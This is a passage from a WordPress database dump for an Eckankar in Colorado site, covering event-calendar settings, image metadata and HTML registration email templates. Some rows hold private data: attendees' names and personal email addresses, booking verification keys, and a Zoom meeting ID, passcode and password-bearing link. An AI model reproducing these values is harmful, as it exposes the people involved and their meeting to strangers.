src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(183427,268482,'mec_event_status','EventScheduled'),(183428,268482,'mec_moved_online_link',''),(183429,268482,'mec_cancelled_reason',''),(183430,268482,'mec_display_cancellation_reason_in_single_page',''),(183431,268482,'protect_children',''),(183432,268482,'passster_activate_global_protection',NULL),(183433,268482,'passster_activate_protection',NULL),(183434,268482,'passster_protection_type','password'),(183435,268482,'boldgrid_hide_page_title','0'),(183436,268482,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(183437,268482,'boldgrid_in_page_containers','1'),(183441,268482,'_dp_original','266540'),(183439,268482,'_thumbnail_id','268483'),(183440,268482,'_wp_old_date','2022-04-30'),(183442,268482,'_edit_lock','1687403703:2'),(183443,268482,'passster_area_shortcode',''),(183444,268482,'_edit_last','2'),(183445,268483,'_wp_attached_file','2023/05/MountainStream.webp'),(183446,268483,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:27:\"2023/05/MountainStream.webp\";s:8:\"filesize\";i:69390;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"MountainStream-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13706;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"MountainStream-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6572;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"MountainStream-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:22138;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"MountainStream-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:36032;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"MountainStream-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:25594;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"MountainStream-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:28936;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(183447,268484,'protect_children',''),(183448,268484,'mec_color',''),(183449,268484,'mec_location_id','122'),(183450,268484,'mec_dont_show_map','0'),(183451,268484,'mec_organizer_id','1'),(183452,268484,'mec_read_more',''),(183453,268484,'mec_more_info',''),(183454,268484,'mec_more_info_title',''),(183455,268484,'mec_more_info_target','_self'),(183456,268484,'mec_cost',''),(183457,268484,'mec_currency','a:0:{}'),(183458,268484,'mec_additional_organizer_ids','a:0:{}'),(183459,268484,'mec_additional_location_ids','a:0:{}'),(183460,268484,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-04\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-04\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(183461,268484,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(183462,268484,'mec_certain_weekdays','a:0:{}'),(183463,268484,'mec_allday','0'),(183464,268484,'one_occurrence','0'),(183465,268484,'mec_hide_time','0'),(183466,268484,'mec_hide_end_time','0'),(183467,268484,'mec_comment',''),(183468,268484,'mec_timezone','global'),(183469,268484,'mec_countdown_method','global'),(183470,268484,'mec_public','1'),(183471,268484,'mec_start_date','2023-06-04'),(183472,268484,'mec_start_time_hour','10'),(183473,268484,'mec_start_time_minutes','30'),(183474,268484,'mec_start_time_ampm','AM'),(183475,268484,'mec_start_day_seconds','37800'),(183476,268484,'mec_end_date','2023-06-04'),(183477,268484,'mec_end_time_hour','11'),(183478,268484,'mec_end_time_minutes','30'),(183479,268484,'mec_end_time_ampm','AM'),(183480,268484,'mec_end_day_seconds','41400'),(183481,268484,'mec_repeat_status','0'),(183482,268484,'mec_repeat_type',''),(183483,268484,'mec_repeat_interval','1'),(183484,268484,'mec_repeat_end',''),(183485,268484,'mec_repeat_end_at_occurrences',''),(183486,268484,'mec_repeat_end_at_date',''),(183487,268484,'mec_advanced_days','a:0:{}'),(183488,268484,'mec_in_days',''),(183489,268484,'mec_not_in_days',''),(183490,268484,'mec_hourly_schedules','a:0:{}'),(183491,268484,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(183492,268484,'mec_tickets','a:0:{}'),(183493,268484,'mec_fees_global_inheritance','1'),(183494,268484,'mec_fees','a:0:{}'),(183495,268484,'mec_ticket_variations_global_inheritance','1'),(183496,268484,'mec_ticket_variations','a:0:{}'),(183497,268484,'mec_reg_fields_global_inheritance','1'),(183498,268484,'mec_reg_fields','a:0:{}'),(183499,268484,'mec_bfixed_fields','a:0:{}'),(183500,268484,'mec_op','a:0:{}'),(183501,268484,'mec_fields','a:0:{}'),(183502,268484,'mec_event_status','EventScheduled'),(183503,268484,'mec_moved_online_link',''),(183504,268484,'mec_cancelled_reason',''),(183505,268484,'mec_display_cancellation_reason_in_single_page',''),(183506,268484,'boldgrid_hide_page_title','0'),(183507,268484,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(183508,268484,'passster_activate_global_protection',NULL),(183509,268484,'passster_activate_protection',NULL),(183510,268484,'passster_protection_type','password'),(183511,268484,'boldgrid_in_page_containers','1'),(183512,268484,'passster_area_shortcode',''),(183513,268484,'_thumbnail_id','268485'),(183515,268484,'_dp_original','268479'),(183516,268484,'_edit_lock','1687404989:2'),(183517,268484,'_edit_last','2'),(183518,268485,'_wp_attached_file','2023/05/HUFlowers.webp'),(183519,268485,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:22:\"2023/05/HUFlowers.webp\";s:8:\"filesize\";i:41498;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"HUFlowers-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11168;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"HUFlowers-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5682;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"HUFlowers-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14468;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"HUFlowers-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:24742;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"HUFlowers-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19006;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"HUFlowers-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:17130;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(183925,268564,'_field_224','Lincoln'),(183926,268564,'_field_225','Torres'),(183927,268564,'_field_226','lincolnrileyjames@gmail.com'),(183928,268564,'_field_227','CO'),(183929,268564,'_field_228','US'),(183930,268564,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(185930,268713,'mec_cancellation_key','c25765db5b91fdbdafca4763ab84eb98'),(189183,268860,'mec_repeat_status','0'),(189184,268860,'mec_repeat_type',''),(185929,268713,'mec_verification_key','f1779ea348e5923125de5ac49618f2d3'),(185928,268713,'mec_verified','1'),(185927,268713,'mec_user_id','1000088'),(185926,268713,'mec_gateway_label','Free'),(183970,268565,'mec_repeat_end_at_occurrences',''),(183971,268565,'mec_repeat_end_at_date',''),(183972,268565,'mec_advanced_days','a:0:{}'),(183973,268565,'mec_in_days',''),(183974,268565,'mec_not_in_days',''),(183975,268565,'mec_hourly_schedules','a:0:{}'),(183976,268565,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(183977,268565,'mec_tickets','a:0:{}'),(183978,268565,'mec_fees_global_inheritance','1'),(183979,268565,'mec_fees','a:0:{}'),(183980,268565,'mec_ticket_variations_global_inheritance','1'),(183981,268565,'mec_ticket_variations','a:0:{}'),(183982,268565,'mec_reg_fields_global_inheritance','1'),(183983,268565,'mec_reg_fields','a:0:{}'),(183984,268565,'mec_bfixed_fields','a:0:{}'),(183985,268565,'mec_op','a:0:{}'),(183986,268565,'mec_fields','a:0:{}'),(183987,268565,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(185925,268713,'mec_gateway','MEC_gateway_free'),(185924,268713,'mec_transaction_id','MPV39039'),(183969,268565,'mec_repeat_end',''),(183968,268565,'mec_repeat_interval','1'),(183966,268565,'mec_repeat_status','0'),(183967,268565,'mec_repeat_type',''),(183951,268565,'mec_hide_end_time','0'),(183952,268565,'mec_comment',''),(183953,268565,'mec_timezone','global'),(183954,268565,'mec_countdown_method','global'),(183955,268565,'mec_public','1'),(183956,268565,'mec_start_date','2023-06-11'),(183957,268565,'mec_start_time_hour','10'),(183958,268565,'mec_start_time_minutes','30'),(183959,268565,'mec_start_time_ampm','AM'),(183960,268565,'mec_start_day_seconds','37800'),(183961,268565,'mec_end_date','2023-06-11'),(183962,268565,'mec_end_time_hour','11'),(183963,268565,'mec_end_time_minutes','30'),(183964,268565,'mec_end_time_ampm','AM'),(183965,268565,'mec_end_day_seconds','41400'),(183846,268540,'_field_224','Jackie'),(183847,268540,'_field_225','H'),(183848,268540,'_field_226','sieramari@Yahoo.com'),(183849,268540,'_field_227','CO'),(183850,268540,'_field_228','US'),(183851,268540,'_field_229','a:1:{i:0;s:16:\"Colorado Springs\";}'),(183852,268540,'_form_id','21'),(183853,268540,'_seq_num','173'),(189179,268860,'mec_end_time_minutes','30'),(189180,268860,'mec_end_time_ampm','AM'),(189181,268860,'mec_end_day_seconds','41400'),(189177,268860,'mec_end_date','2023-08-27'),(189178,268860,'mec_end_time_hour','11'),(189176,268860,'mec_start_datetime','2023-08-27 10:30 AM'),(189174,268860,'mec_start_time_ampm','AM'),(189175,268860,'mec_start_day_seconds','37800'),(189173,268860,'mec_start_time_minutes','30'),(189172,268860,'mec_start_time_hour','10'),(189170,268860,'mec_public','1'),(184003,268565,'_dp_original','268411'),(183988,268565,'mec_event_status','EventScheduled'),(183989,268565,'mec_moved_online_link',''),(183990,268565,'mec_cancelled_reason',''),(183991,268565,'mec_display_cancellation_reason_in_single_page',''),(183992,268565,'protect_children',''),(183993,268565,'passster_activate_global_protection',NULL),(183994,268565,'passster_activate_protection',NULL),(183995,268565,'passster_protection_type','password'),(183996,268565,'boldgrid_hide_page_title','0'),(183997,268565,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(183998,268565,'boldgrid_in_page_containers','1'),(183999,268565,'_thumbnail_id','267220'),(184000,268565,'_wp_old_date','2022-04-30'),(184001,268565,'passster_area_shortcode',''),(189171,268860,'mec_start_date','2023-08-27'),(189169,268860,'mec_trailer_title',''),(189168,268860,'mec_trailer_url',''),(189167,268860,'mec_style_per_event','global'),(189166,268860,'mec_countdown_method','global'),(189164,268860,'mec_comment',''),(189165,268860,'mec_timezone','global'),(189162,268860,'mec_hide_time','0'),(192787,269144,'_thumbnail_id','269145'),(192788,269145,'original-file','2023/10/sunset-lake-6-updraft-pre-smush-original.jpg'),(192789,269145,'smush-complete','1'),(192790,269145,'smush-info','The file was compressed from 108.36 KB to 95.69 KB, saving 11.69 percent, using 